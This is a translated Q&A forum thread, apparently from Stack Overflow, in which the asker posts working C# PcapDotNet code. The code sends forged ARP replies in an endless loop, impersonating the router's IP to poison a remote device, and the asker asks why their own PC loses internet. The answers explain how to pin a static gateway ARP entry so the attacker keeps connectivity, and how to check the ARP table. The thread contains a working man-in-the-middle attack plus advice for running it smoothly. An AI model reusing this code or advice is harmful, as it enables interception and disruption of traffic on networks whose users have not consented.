ARP对自己中毒

时间:2013-03-17 20:50:40

标签: c# network-programming winpcap arp pcap.net

我正在使用PcapDotNet使用下一个代码创建ARP毒性数据包:

using (PacketCommunicator communicator =
            selectedDevice.Open(100, PacketDeviceOpenAttributes.Promiscuous, 1000)) 
        {
            while (true)
            {
                Packet arp;

                EthernetLayer ethernetLayer = new EthernetLayer
                {
                    Source = new MacAddress("f8:d1:11:05:8c:91"), // My Mac
                    Destination = new MacAddress("5c:da:d4:29:6d:5f"), // Remote device IP
                    EtherType = EthernetType.None, // Will be filled automatically.
                };

                ArpLayer arpLayer = new ArpLayer
                {
                    ProtocolType = EthernetType.IpV4,
                    Operation = ArpOperation.Reply,
                    SenderHardwareAddress = new byte[] { 0xf8, 0xd1, 0x11, 0x05, 0x8c, 0x91 }.AsReadOnly(), // My MAC
                    SenderProtocolAddress = new byte[] { 192, 168, 1, 254 }.AsReadOnly(), // My Router IP

                    TargetHardwareAddress = new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }.AsReadOnly(),
                    TargetProtocolAddress = new byte[] { 0, 0, 0, 0 }.AsReadOnly(),
                };

                PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer);

                arp = builder.Build(DateTime.Now);

                communicator.SendPacket(arp);
                System.Threading.Thread.Sleep(500);
            }
        }

问题是:我可以毒害远程设备,但我的PC也丢失了互联网(中毒?)。 我想也许问题是我必须指出(以某种方式)我希望我自己的系统不读取我发送的数据包...但我不知道如何.... 有人可以解释一下这里的问题是什么吗?

2 个答案:

答案 0 :(得分:2)

将包含网关IP的ARP条目标记为静态(使用正确的硬件地址)。 为此,请在cmd中以管理员身份执行以下操作:

netsh interface ip add neighbors "{Network Device}" {IP Address} {MAC Address}

网络设备例如是“本地连接”“以太网”(不要忘记引号)。要查找当前使用的网络设备,请执行命令“ ncpa.cpl ”。

如果要删除静态条目,请在cmd中执行以下命令:

netsh interface ip delete neighbors "{Network Device}" {IP Address}

此外,请记住,您可能没有互联网的原因之一是因为网络中的所有流量都被重定向到您的主机。由于您的主机与路由器的功能不同,因此可能会出现网络拥塞。为了确保您无法访问互联网的原因是您自己中毒,请在cmd中执行命令“ arp -a ”并检查路由器的硬件地址。如果硬件地址与主机的硬件地址相同,那么您自己就会中毒。

答案 1 :(得分:0)

您是否有可能为路由器内部IP创建毒性记录?如果是这样,那么您的互联网连接停止工作就不足为奇了,因为您的操作系统将无法再向您的路由器发送任何内容,因此也无法向互联网发送任何内容。